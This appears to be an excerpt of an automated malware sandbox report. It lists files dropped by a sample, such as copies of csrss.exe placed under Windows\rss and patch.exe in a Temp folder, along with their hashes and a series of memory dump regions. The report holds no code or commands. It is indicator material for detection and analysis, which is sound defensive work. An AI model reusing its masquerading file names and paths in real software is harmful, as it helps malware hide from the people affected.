C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

Filesize
448KB

MD5
91172a448951b6d010751e6473fa6abd

SHA1
45ae9d86040c5f33318d33e81ba82ae64f950771

SHA256
f49b2d7a211617fa44200bc9f792534adbc4ced0930269876d2a8b8ce02d6773

SHA512
df384f804114158475931bb0851d2516768b209e5cf26020fff76d828d3b216d09adb5e55c9265ecb5495f369f762e44445851c540bbcd0d6dcee0a686bbb25a

Download Submit
C:\Windows\rss\csrss.exe

Filesize
1.4MB

MD5
36875de38ee7957af0f5e5008e1016fa

SHA1
80684e9c348ec47bec98599aef49b971d6a26fd0

SHA256
43f6176250c638efdc0b2a47531ef0dbc8cb82bedcd98826ad9b107cc70c62c1

SHA512
730e9c6fff72026b32448028d269beed4bc13edb112a6a51c78257b15b27f12acc9358014bae7bca72338102f36fa781fbf6b14946f8bb2e4da8f9caaca6eac0

Download Submit
C:\Windows\rss\csrss.exe

Filesize
1.2MB

MD5
d51daa84df97b12434526bcbd0f233ac

SHA1
ec55d15bed94044dd1b94a3071f5d72c70295768

SHA256
e3d802dbf0c64f8c7561bb478cf13fb0d52887f43a14197653be0628725a8471

SHA512
d22a815e3865595e4941dc8bca8da763781b5f398512c2072a58a4b1d980e461c7f196c0a68b306fc3425fb84e75ea1eb7f625d79f2e74bd89b9e59f44dae318

Download Submit
C:\Windows\rss\csrss.exe

Filesize
768KB

MD5
9d46e781cef6ab1778b6955ae40c698b

SHA1
3ab13c2c03593630d33fef28925f88f705878d76

SHA256
c197bd6a4227ff3660bfd338931763a08eebeb8e6aa826955d31ee22e3539bce

SHA512
98b307bc130411ecb9f7ba8c28380213457adb3e5c4a2b472696d076706ed99ddd6330696f4bfc64fc7fb482bf7e413f4bf8e976897325a560322955c9cf725c

Download Submit
\Users\Admin\AppData\Local\Temp\csrss\patch.exe

Filesize
718KB

MD5
120e5cf3545976a4363f87206dfb3975

SHA1
09a422b5e929f7883d6e3558bebb1e14c6055098

SHA256
c1680397f458d9ec7c5c811d5ec59216b0440483200fb164c96c52a432d94a4f

SHA512
7a58a2357dfe57520c804c531fd319dfd78cc5bfb6d8623129327ec6a15b6c4229833e91b9d5b30253b97fb5454dd26fef765adfb26a8017cb224089f9b64313

Download Submit
\Users\Admin\AppData\Local\Temp\dbghelp.dll

Filesize
1.5MB

MD5
f0616fa8bc54ece07e3107057f74e4db

SHA1
b33995c4f9a004b7d806c4bb36040ee844781fca

SHA256
6e58fcf4d763022b1f79a3c448eb2ebd8ad1c15df3acf58416893f1cbc699026

SHA512
15242e3f5652d7f1d0e31cebadfe2f238ca3222f0e927eb7feb644ab2b3d33132cf2316ee5089324f20f72f1650ad5bb8dd82b96518386ce5b319fb5ceb8313c

Download Submit
\Users\Admin\AppData\Local\Temp\symsrv.dll

Filesize
163KB

MD5
5c399d34d8dc01741269ff1f1aca7554

SHA1
e0ceed500d3cef5558f3f55d33ba9c3a709e8f55

SHA256
e11e0f7804bfc485b19103a940be3d382f31c1378caca0c63076e27797d7553f

SHA512
8ff9d38b22d73c595cc417427b59f5ca8e1fb7b47a2fa6aef25322bf6e614d6b71339a752d779bd736b4c1057239100ac8cc62629fd5d6556785a69bcdc3d73d

Download Submit
\Windows\rss\csrss.exe

Filesize
2.5MB

MD5
749200f3b13f41f406ffc3226390ea6f

SHA1
4b8813c166cc03544f3522b3bd121e17f319518f

SHA256
e5ae9cbc9da72718361b5f5fbc5a951d36cf03a86f7197c602ada1074f300c20

SHA512
1e7dbbde22cd089d0cf745db16c2d4923961fb9e7bc4037a2e1960afb60abd6b191e09e27b40dafcb16d1e7be9cf678ceaddff8cf323083e3c2aa158f28ce2d0

Download Submit
\Windows\rss\csrss.exe

Filesize
2.0MB

MD5
21b051564c65de59a55d30e6a007e037

SHA1
52b8993c5e5d9c8db9d98533cf4ea392d04eed2e

SHA256
ec0e8e7bbd839b3e2229c61017b2f7da768327148555988b7ec834a0d7885ccc

SHA512
957c5fee86d21bc52f182d69906caf7fb0419b4f29b82ff18ed1afe7d68b40c2d114b536e1fb53f77d38fb145c61942f61df179bf62b2ecdf2e5e7ff865d7828

Download Submit
memory/992-44-0x0000000002500000-0x000000000293C000-memory.dmp

Filesize
4.2MB

Download
memory/992-27-0x0000000002500000-0x000000000293C000-memory.dmp

Filesize
4.2MB

Download
memory/992-62-0x0000000000400000-0x0000000000D41000-memory.dmp

Filesize
9.3MB

Download
memory/992-43-0x0000000000400000-0x0000000000D41000-memory.dmp

Filesize
9.3MB

Download
memory/992-42-0x0000000000400000-0x0000000000D41000-memory.dmp

Filesize
9.3MB

Download
memory/992-39-0x0000000002500000-0x000000000293C000-memory.dmp

Filesize
4.2MB

Download
memory/992-45-0x0000000000400000-0x0000000000D41000-memory.dmp

Filesize
9.3MB

Download
memory/992-46-0x0000000000400000-0x0000000000D41000-memory.dmp

Filesize
9.3MB

Download
memory/992-47-0x0000000000400000-0x0000000000D41000-memory.dmp

Filesize
9.3MB

Download
memory/992-58-0x0000000000400000-0x0000000000D41000-memory.dmp

Filesize
9.3MB

Download
memory/1832-59-0x0000000140000000-0x00000001405E8000-memory.dmp

Filesize
5.9MB

Download
memory/2004-26-0x0000000000400000-0x0000000000D41000-memory.dmp

Filesize
9.3MB

Download
memory/2004-18-0x0000000000400000-0x0000000000D41000-memory.dmp

Filesize
9.3MB

Download
memory/2004-16-0x00000000027F0000-0x0000000002C2C000-memory.dmp

Filesize
4.2MB

Download
memory/2004-14-0x0000000000400000-0x0000000000D41000-memory.dmp

Filesize
9.3MB

Download
memory/2004-11-0x00000000027F0000-0x0000000002C2C000-memory.dmp

Filesize
4.2MB

Download
memory/2004-13-0x0000000000400000-0x0000000000D41000-memory.dmp

Filesize
9.3MB

Download
memory/2004-12-0x00000000027F0000-0x0000000002C2C000-memory.dmp

Filesize
4.2MB

Download
memory/2044-5-0x0000000000400000-0x0000000000D41000-memory.dmp

Filesize
9.3MB

Download
memory/2044-0-0x0000000002730000-0x0000000002B6C000-memory.dmp

Filesize
4.2MB

Download
memory/2044-6-0x0000000002730000-0x0000000002B6C000-memory.dmp

Filesize
4.2MB

Download
memory/2044-7-0x0000000002B70000-0x0000000003496000-memory.dmp

Filesize
9.1MB

Download
memory/2044-4-0x0000000000400000-0x0000000000D41000-memory.dmp

Filesize
9.3MB

Download
memory/2044-3-0x0000000000400000-0x0000000000D41000-memory.dmp

Filesize
9.3MB

Download
memory/2044-8-0x0000000000400000-0x0000000000D41000-memory.dmp

Filesize
9.3MB

Download
memory/2044-9-0x0000000000400000-0x0000000000D41000-memory.dmp

Filesize
9.3MB

Download
memory/2044-10-0x0000000000400000-0x0000000000D41000-memory.dmp

Filesize
9.3MB

Download
memory/2044-2-0x0000000002B70000-0x0000000003496000-memory.dmp

Filesize
9.1MB

Download
memory/2044-1-0x0000000002730000-0x0000000002B6C000-memory.dmp

Filesize
4.2MB

Download